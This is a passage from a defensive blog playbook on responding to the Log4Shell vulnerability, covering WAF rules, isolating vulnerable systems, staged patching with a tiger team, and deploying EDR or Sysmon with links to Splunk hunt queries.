Ref: https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mi
Note – find out if your Next-gen firewall already has you covered in this area – if so, ask security engineers to segment and set up accordingly. Some have stated that certain NGFW are able to act as a WAF in terms of capability, please test and verify the capabilities of any tools and claims.
Snyk says “WAF rules can be added to filter inbound requests.
Note that this isn’t an approach that should be relied upon, since attackers are creating new attack strings every hour that can circumvent these rules.
You might need to add these manually, but some WAF providers, such as CloudFlare, have already released new rules to deny requests that look like malicious attacks against this vulnerability.” Note: Examples to bypass rules can be found at their link below and should be noted for potential detections and detection queries. These are subject to change like any IOC.
Ref: https://snyk.io/blog/log4shell-remediation-cheat-sheet/
=====================================
#8 – ISOLATE VULNERABLE SYSTEMS THAT MUST USE JNDI - INTO UNTRUSTED VLAN(s)
- I made this one #8 because it requires some added logistics and changes that could involve architecture, testing and change control – these could take time
- May want to establish an emergency process or use an existing emergency change control process – to expedite if the risk is acceptable and other options are slower
- This one depends on correct configs and may require some testing and tuning
- Work wth your network admins and/or network security side to ensure success
- If unable to segment everything, then segment at least highest risk / most vulnerable / most critical systems
Per CISA advice “Moving the asset to a ‘jail VLAN’ with heightened monitoring and security” Ref: https://www.cisa.gov/uscert/ncas/alerts/aa21-356a. Work with your network folks to determine what is and is not feasible in light of that advice.
=====================================
#9 – START PATCHING OTHER CRITICAL SYSTEMS, PREPARE TO TRANSITION TO TIGER TEAM for the LONG-TERM
- The reason I made this one last is because this will become more of a long-tail effort
- I advise that companies not try to patch everything at once – this will burn people out
- Establish a risk-based process based priorities – and transition to a Tiger Team using a bottom-up, project-like approach - and then look for longer-term solutions (I will cover this in a future article)
- This may require adjusting some strategic objectives and program/projects currently under way to shift resources to this new focus area – choices and trade-offs must be made
- This also speaks to ensuring one builds in a surge capability for these types of major vulnerability events as part of the norm of possibility
- This is better than disrupting existing projects – because the norm means “there will be pop-up surprises and emergencies”
- Since this is predictable, make deliberate preparations!
In a future article, I will talk about how to be more deliberate and better prepared for these situations based on decades of lessons learned in a military environment. The process must be deliberate, and preparation and training are keys to readiness. Otherwise, each time will bring an emergency that results in disruption and chaos, derailing other projects. There is a better way. Some basic concepts which are important follow.
Prepare for a Transition from Surge to Sustainment Operations for Log4J, SolarWinds, etc.
While there are some assets to patch ASAP with the IR team process, this should be followed by an eventual transition process, using a longer-term project-based approach. I recommend this transition to a Tiger Team happens within 30 days or less, if possible. This provides a goal to achieve everything needed (such as what I’m providing in playbooks 2A and 2B) using a time-bound approach.
The Tiger-team should also include a re-normalization milestone as well. I recommend 90 days after transition if possible, to "normal base operations" to absorb any residuals. Then require “new normal” items from Log4J, for example, to roll into the normal ops and maintenance process for the longer-term sustainment to continue to meet the challenge for the long-haul. Here is the basic concept:
- Immediate emergency response capability (Day 1 - Day 30 - max)
- Secondary response and transition using Tiger Team if needed (Days 30-90) - and/or
- Transition to baseline operations (must be robust enough to be absorbable)
One must look at doing such things anytime a major issue occurs in cyber, as well as how to transition back to normal operations after a surge. It never ceases to amaze how the concepts ingrained from years in the military are so directly applicable and could prove valuable for cyber defense processes.
And by the way, any company that hires a Veteran gets this value and doesn't even realize it. The value of someone trained and ingrained with a mindset to make things better, using various concepts and constructs they learned and applied in real-world situations, is invaluable.
Coming Soon
I'll provide a longer-term bottom-up strategy to help others transition and eventually re-normalize operations. This “line of effort” should be done via a separate Tiger Team from the IR team tackling things in Part 2A and 2B of this playbook. This team is needed so things can be paced, to avoid burnout.
Seek out experience-based consulting and guidance in this area. Best to ask those with direct experience with these vendors, their products and running proof-of-concepts as well as selection processes to test, evaluate, making purchase decisions, and success with logistics regarding such tools.
Again, I advise a transition occur between the teams after completing these major and quick response items in this playbook. A Tiger Team should be stood up to continue the efforts after the 30-day mark, that will require longer-term projects or lines of effort, until complete and things can get back to normal sustainment levels.
Additional Notes and Cautions
While as of this writing I stand by the order recommended above for actions to take, this is not permanent. If one or two solutions become more effective and/or enduring than the rest, then obviously do those first. “Adjust fire” as they say (for any military folks out there.)
Note also the size and context of companies can differ significantly. Some are fully cloud-based, others are often hybrid. Some companies are small, others are large. Some have OT, others do not. Additionally, the number of resources and maturity levels vary. Number of devices and products also vary.
This means each company’s Cyber and IT team is encouraged to analyze the advice, conduct initial tests themselves, and determine the best courses of action applicable for their context. There are several other variables at play where one size does not always fit all. I have tried to keep that in mind as I provide the advice I feel could fit most companies initially.
Teamwork and cooperation is required between Cyber and IT teams for “unity of effort”
“Unity of effort” is again another one of those enduring principles that help defenders achieve success. These efforts should consist of several actions requiring dedicated teamwork and response:
- Isolating and remediating any attacked and compromised assets
- Looking at the rest of the kill chain to determine further post-exploit compromise and then working quickly to eradicate these
- Simultaneously working these steps recommended in this playbook (part A and B)
- Transitioning to longer-term tiger-team / project-based approach when appropriate
The team should use reliable and trusted scan and test tools made available by existing tools in the environment (vulnerability scanners, Antivirus, network, etc.). I’ve provided the links to the ones that seem to be trusted and helpful, plus freely available for immediate use.
If you have any feedback regarding these tools and recommendations, please let the creator of the tool know directly and query them for a fix. Please don’t send these requests my way, as I have no control over the quality, output or changes to tools. Use entirely at your own risk.
If you desire, let me know if there is anything else you discover for the benefit of the community that I can share i.e. “lessons learned” that could help others save time, energy and effort and avoid friction where possible. Comments are best in that regard.
Caution must be taken as first advice and tools are usually at the bleeding edge and may contain some flaws. Note that permission should be sought by CISO and/or CIO before any tools or scripts are run on the liver operational network.
Since I’ve been on both the IT side of things and Cyber side of things, I have appreciation for both. This is why I recommend any script, tool or code used on the network be approved first for test, and then operations only via a documented decision made by CISO and/or CIO.
Final Caveats and Recommendations
1. Daily communication and coordination are a must for success of these efforts. Management should be deliberate in their approach to facilitate this and achieve unity of effort and success.
2. Please do your own due diligence to ensure any security or other tool brought into the environment is not itself vulnerable to Log4J or similar logging attacks. Ask the vendor, and keep these tools patched. Some publicly available tools may not be patched so be aware of that.
3. Information in Cyber gets stale quickly - to include this info, and may not be kept current. I do not provide any claims, warranties or guarantees that anything will work as described or expected. You probably already knew that. Test everything first and deploy carefully and at your own risk.
4. Strongly consider deploying EDR and/or SYSMON if you are not using either of these – they're critical for visibility and dealing with issues such as the risk posed by Log4J vulnerabilities. See appendix A below. There are some excellent solutions available today that can be deployed in hours to maximize visibility and defenses greater than ever before in a scalable way.
=================================================================
APPENDIX A – SYSMON and EDR-BASED ADVICE
If EDR or SYSMON is not already running on key Servers, I highly recommend it. EDR and SYSMON are usually lightweight on the endpoint and quick to deploy, much quicker than other endpoint agents such as Traditional Antivirus. They can even be added on top of other existing AV, although be really careful there, and test thoroughly.
Sometimes things can go bad, so ask if Traditional AV vendors have any EDR solutions as part of their package, as an option rather than using rip-and-replace. Most Traditional AV vendors now offer EDR. How mature their solutions are also varies, as does how tamper-proof the solutions are.
I feel that if you’re not already running EDR, you’re way behind in terms of modern security telemetry and visibility. Again, an interim step is to use Sysmon until EDR is deployed. See item in step #1B mentioned earlier. Both collect a lot of great telemetry from endpoints.
Another idea is to deploy EDR on a graduated group of test systems using vendor a proof-of-concept trial. This provides an opportunity to test a vendor’s product and determine if it adds value beyond what current tools provide.
EDR Should be Easy-button Easy
EDR should not be high-maintenance or cumbersome in any way, and it should be easy to deploy, use and detect/block/respond. It should be a huge force multiplier and boost capabilities, not drag them down.
If your existing EDR is not helping, there are many great options out there. Half the battle is how automated they are, as well as how easily they block and/or alert – to minimize the learning curve. They should be intuitive. I will talk about the importance of EDR and other considerations in another future post.
The ability to see and quickly a reach out and touch assets no matter where they are is critical – and that’s what EDR provides. If you have a prem-based solution for Antivirus and cannot reach out and touch solutions when remote, that’s a problem.
There are some EDR options that are simple to use, quick to deploy and had great out-of-box detections and automated blocking capabilities using built-in UEBA to reduce response time. Some work much better than others and catch nearly everything and provide less friction when implementing.
There is advice on EDR options, the process of testing in a POC, as well as vendor selection that is also important. Retaining someone who understands the implementation and logistical aspects involved for behavior-based products such as EDR and network-side behavior-based products is critical.
I also understand concerns of budget and training and are happy to advise on options and considerations to result in a smart decision. Shameless plug - I have a relationship a couple vendors but also don’t make cyber product investment recommendations lightly for any paid solutions. I currently do not have relationships with the other vendors in this post, so proceed at your own risk.
Use SYSMON if EDR is not possible
SYSMON is free for Windows and now freely available for Linux (credit to Splunk for the tidbit)
This provides an option to deploy SYSMON to relevant servers and other endpoints aside from Windows machines, especially those without an EDR solution not providing endpoint telemetry such as Apache servers – sorely needed for Log4shell attacks.
This means companies might be otherwise blind to attacks and visibility on these endpoints, even if Antivirus (AV) is running on them. This is because Traditional AV may not detect if it does not include EDR capability.
Traditional AV only detects signature-based issues after-the-fact and after-the-scan. Use Sysmon as an interim step or backup to EDR if your organization requires the depth and endpoints can handle the agents.
Helps:
For Log4J attack detections, here are links for Sysmon for Linux. Note there are other tools also available for telemetry for Linux such as Procmon:
Sysmon for Linux: https://github.com/Sysinternals/SysmonForLinux
Procmon for Linux: https://github.com/Sysinternals/ProcMon-for-Linux
Procdump for Linux: https://github.com/Sysinternals/ProcDump-for-Linux
Sysmon for Windows: https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
Per Splunk, "Here’s a raw event search you could use to find all processes, or parent processes, with “log4j” in the name, against Sysmon data (both Linux and Windows)." See: https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html for the detection code and instructions.
Splunk mentions "Another technique for detecting the presence of Log4j on your systems is to leverage file creation logs, e.g., EventCode 11 in Sysmon" and they provide a valuable search hunting string at the above link as well. If using Splunk, I highly recommend ensuring this detection is implemented and tested.
Splunk also provides several other searches for hunt queries for possible attack indicators:
- Suricata and other IDS query
- Detecting Outbound LDAP Access on Your Network
- Correlation of JNDI Probes with DNS Queries
- Other detections related to outbound and inbound traffic
Credit: https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html
Again, if Sysmon is capturing this data and floating it to Splunk these are critical alerts that must get the attention of your SOC security alerting and monitoring process, as well as hunt teams.
EDR is a lightweight option that can provide immediate visibility and telemetry in the critical places where it is needed. For threat hunting teams, timely threat intelligence is needed for timely hunt operations. In addition, tools like EDR provide the info and ability to touch these assets.
Again Sysmon is an alternative, but with less capability than EDR and requires more tuning, learning, configuration and does not come with pre-built analytics or automations. All of these take time to implement and tune. EDR could achieve these things more quickly, especially if the solution includes managed services, automated blocks, playbooks and built-in analytics
Finally, any links, advice, tools or recommendations provides should not be assumed to be tested or vetted. I have not tested anything listed herein. Quality of resources are unknown. If you visit and/or follow advice or any links herein, you do so completely at your own risk.
Stay Tuned for What’s Next and let me know if this was helpful!
Slay the Log4Shell Dragon TEAM 2B - Attack Detection and Response Playbook
Then, Part 2B will be followed by the longer-tail things organizations must address:
- Slay the Log4Shell Dragon 3 – Transition to a Tiger-Team and Bottom-up Strategy
- Slay the Log4Shell Dragon 4 – Focus on Application Security - Tackle Root Cause Issues
Comments
Post a Comment